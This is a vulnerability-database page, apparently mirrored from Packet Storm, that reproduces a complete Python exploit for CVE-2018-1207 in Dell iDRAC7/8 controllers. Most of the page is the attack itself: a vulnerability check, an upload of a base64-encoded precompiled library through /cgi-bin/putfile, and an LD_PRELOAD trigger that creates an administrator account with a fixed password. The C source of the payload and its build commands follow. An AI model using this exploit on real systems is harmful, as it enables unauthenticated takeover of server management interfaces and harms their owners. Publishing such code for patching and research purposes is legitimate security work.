📄 Dell EMC iDRAC7/iDRAC8 2.52.52.52 Remote Code Execution

🗓️ 16 Apr 2025 00:00:00Reported by PhotubiasType
packetstorm🔗 packetstorm.news👁 203 Views
Dell EMC iDRAC7/iDRAC8 versions <2.52.52.52 vulnerable to remote code execution via file upload.
Reporter	Title	Published	Views	Family All 13
Circl	CVE-2018-1207	17 Apr 202521:02	–	circl
CNVD	Dell EMC iDRAC7 and iDRAC8 Code Execution Vulnerabilities	27 Mar 201800:00	–	cnvd
CVE	CVE-2018-1207	23 Mar 201814:00	–	cve
Cvelist	CVE-2018-1207	23 Mar 201814:00	–	cvelist
Tenable Nessus	Dell iDRAC Products Multiple Vulnerabilities (Mar 2018)	20 Apr 201800:00	–	nessus
Tenable Nessus	Dell EMC Code Injection (CVE-2018-1207)	17 Jan 202400:00	–	nessus
Exploit DB	Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)	16 Apr 202500:00	–	exploitdb
canvas	Immunity Canvas: IDRAC_APPWEB_RCE	23 Mar 201814:29	–	canvas
Nuclei	Dell iDRAC7/8 Devices - Remote Code Injection	1 Jun 202605:38	–	nuclei
NVD	CVE-2018-1207	23 Mar 201814:29	–	nvd
# Exploit Title: Dell EMC iDRAC7/iDRAC8 2.52.52.52 -  Remote Code Execution (RCE) via file upload
    # Date: 2024-08-28
    # Exploit Author: Photubias
    # Vendor Homepage: https://dell.com
    # Vendor Advisory: [1] https://dl.dell.com/manuals/all-products/esuprt_solutions_int/esuprt_solutions_int_solutions_resources/dell-management-solution-resources_White-Papers6_en-us.pdf
    # Version: integrated Dell Remote Access Console v7 & v8 < 2.52.52.52
    # Tested on: iDRAC 7 & 8
    # CVE: CVE-2018-1207
    
    r'''
        Copyright 2024 Photubias(c)        
        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.
        
        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.
        
        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
        
        File name CVE-2018-1207.py
        written by Photubias
    
        CVE-2018-1207 is an unauthenticated file upload and 
         so library execution vulnerability on the HTTPS web interface. 
        This exploit contains a checker and a builtin exploit to add a webuser for remote admin access
        
        # Manual verification example, if libraries are returned, the target is vulnerable: 
        #      curl -ik "http://192.168.1.100//cgi-bin/login?LD_DEBUG=files"
        
        Feel free to scan your network via the iDRAC fingerprinter to find vulnerable systems:
        https://github.com/tijldeneut/Security/blob/master/iDRAC-fingerprinter.py
    
        This is a native implementation, written in Python 3 and only requires requests (pip3 install requests)
        Works equally well on Windows as Linux (as MacOS, probably ;-)
    
        Features: vulnerability checker + exploit
    
        WARNING: The built-in payload is precompiled and does this:
        - Configure USER ID 13 with username 'user', password 'Passw0rd' and as an iDRAC webadmin
        - Any user that might be at ID 13 will be overridden and is unrecoverable
        - TIP1: use racadm for command line access after exploitation (also uses TCP/443)
        - TIP2: use racadm to retrieve user hash with command: racadm -r <ip> -u user -p Passw0rd get iDRAC.Users.2
    '''
    
    import requests, optparse, base64, struct, time
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
    requests.warnings.filterwarnings('ignore', category=DeprecationWarning) 
    
    iTimeout = 10
    
    sPayloadCode ='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
    #> For the source code of this pre-compiled C code, see below
    
    ## Main program
    class CustomHTTPAdapter(requests.adapters.HTTPAdapter):
        def init_poolmanager(self, *args, **kwargs):
            context = requests.ssl.create_default_context()
            context.set_ciphers('ALL:@SECLEVEL=0')
            context.check_hostname = False
            context.minimum_version = requests.ssl.TLSVersion.SSLv3
            super().init_poolmanager(*args, **kwargs, ssl_context=context)
    
    def callURL(sURL, oSession, bData=None, lstProxies={}, boolVerbose=False):
        try:
            if bData: oResponse = oSession.post(sURL, data=bData, proxies=lstProxies, verify=False) ## Removed timeout here, as it may take a long time to upload files
            else: oResponse = oSession.get(sURL, proxies=lstProxies, verify=False, timeout = iTimeout)
        except: oResponse = None
        return oResponse
    
    def checkVuln(sIP, oSession, lstProxies={}, boolVerbose=False):
        oResponse = callURL(f'https://{sIP}/cgi-bin/login?LD_DEBUG=files', oSession, lstProxies = lstProxies)
        if not oResponse is None and 'calling init: /lib/' in oResponse.text: 
            if boolVerbose:
                print('[*] Data returned: ')
                print(oResponse.text)
            return True
        return False
    
    def uploadAndRunLibrary(bData, oSession, sIP, lstProxies, boolVerbose=False):
        iFFLAGS = 1
        bFAlias = b'RACPKSSHAUTHKEY1'
        bLib = bFAlias + (32 - len(bFAlias))*b'\0'
        bLib += struct.pack('<L', len(bData))
        bLib += struct.pack('<L', iFFLAGS)
        bLib += bData
    
        oResp = callURL(f'https://{sIP}/cgi-bin/putfile', oSession, bLib, lstProxies, boolVerbose)
        if not oResp is None and oResp.status_code == 200: 
            print('[+] File upload successful, giving the system 5 seconds before execution')
            for i in range(5,0,-1): 
                print(i, end='\r')
                time.sleep(1)
        else: 
            print('[-] Error uploading a file, maybe timeout issue, exiting now')
            exit()
        
        oResp = callURL(f'https://{sIP}/cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp', oSession, None, lstProxies, boolVerbose)
        if not oResp is None and oResp.status_code == 200: 
            if boolVerbose: print('[+] Response on executing the library: \n{}'.format(oResp.text))
        else: 
            print('[-] Error executing the library, maybe timeout issue, exiting now')
            exit()
        return True
    
    def main():
        sUsage = (
        'usage: %prog [options] IP/FQDN \n'
        'Example: CVE-2018-1207.py 192.168.0.100\n\n'
        'This script verifies CVE-2018-1207 and then configures/overwrites an admin user with ID 13\n'
        'Built-in creds: username \'user\' and password \'Passw0rd\''
        )
    
        parser = optparse.OptionParser(usage=sUsage)
        parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080')
        parser.add_option('--verbose', '-v', dest='verbose', help='Optional: be verbose, default False', action='store_true', default = False)
    
        (options, args) = parser.parse_args()
        if len(args) == 0: exit(sUsage)
        sIP = args[0]
        oSession  = requests.Session()
        oSession.mount('https://', CustomHTTPAdapter())
        if options.proxy: lstProxies = {'https':options.proxy}
        else: lstProxies={}
        
        print('[+] Checking if https://{} is vulnerable'.format(sIP))
        if checkVuln(sIP, oSession, lstProxies, options.verbose):
            print('[+] Success, target seems vulnerable')
            input('[?] Proceed to exploit and overwrite user ID 13? Press enter to continue or Ctrl+C to cancel now')
    
        print('[+] Okay, uploading the pre-compiled file now, this might take a while: ')
        if uploadAndRunLibrary(base64.b64decode(sPayloadCode), oSession, sIP, lstProxies, options.verbose): print('[+] Succesfully started the reconfiguration of user ID 13')
        print('\n[+] All done, please allow 5 to 10 minutes for file execution and then\n     open a browser to https://{} and log in (user / Passw0rd)\n     or retrieve some hashes via the CLI tool racadm'.format(sIP))
    
    if __name__ == '__main__':
        main()
    
    '''
    [adduser.c]
    #include <unistd.h>
    #include <stdio.h>
    
    static void main(void) __attribute__((constructor));
    static void main(void) 
    {
    	int pid1 = fork();
        if(!pid1) {
    		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminUserName", "user", (char*) NULL);
    	}
    	int pid2 = fork();
        if(!pid2) {
    		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPassword", "Passw0rd", (char*) NULL);
    	}
    	int pid3 = fork();
        if(!pid3) {
    		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPrivilege", "0x000001ff", (char*) NULL);
    	}
    	int pid4 = fork();
        if(!pid4) {
    		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminEnable", "1", (char*) NULL);
    	}
    	// Note: it takes 5 to 10 minutes before these 4 commands are executed
    }
    // Install "gcc-10-sh4-linux-gnu" (or replace gcc-10 with gcc-11 or newer) and compile the code like this:
    //  sh4-linux-gnu-gcc-10 -shared -fPIC adduser.c -o adduser.so
    '''
16 Apr 2025 00:00Current
9.9High risk
Vulners AI Score9.9
CVSS 27.5
CVSS 39.8
EPSS0.9379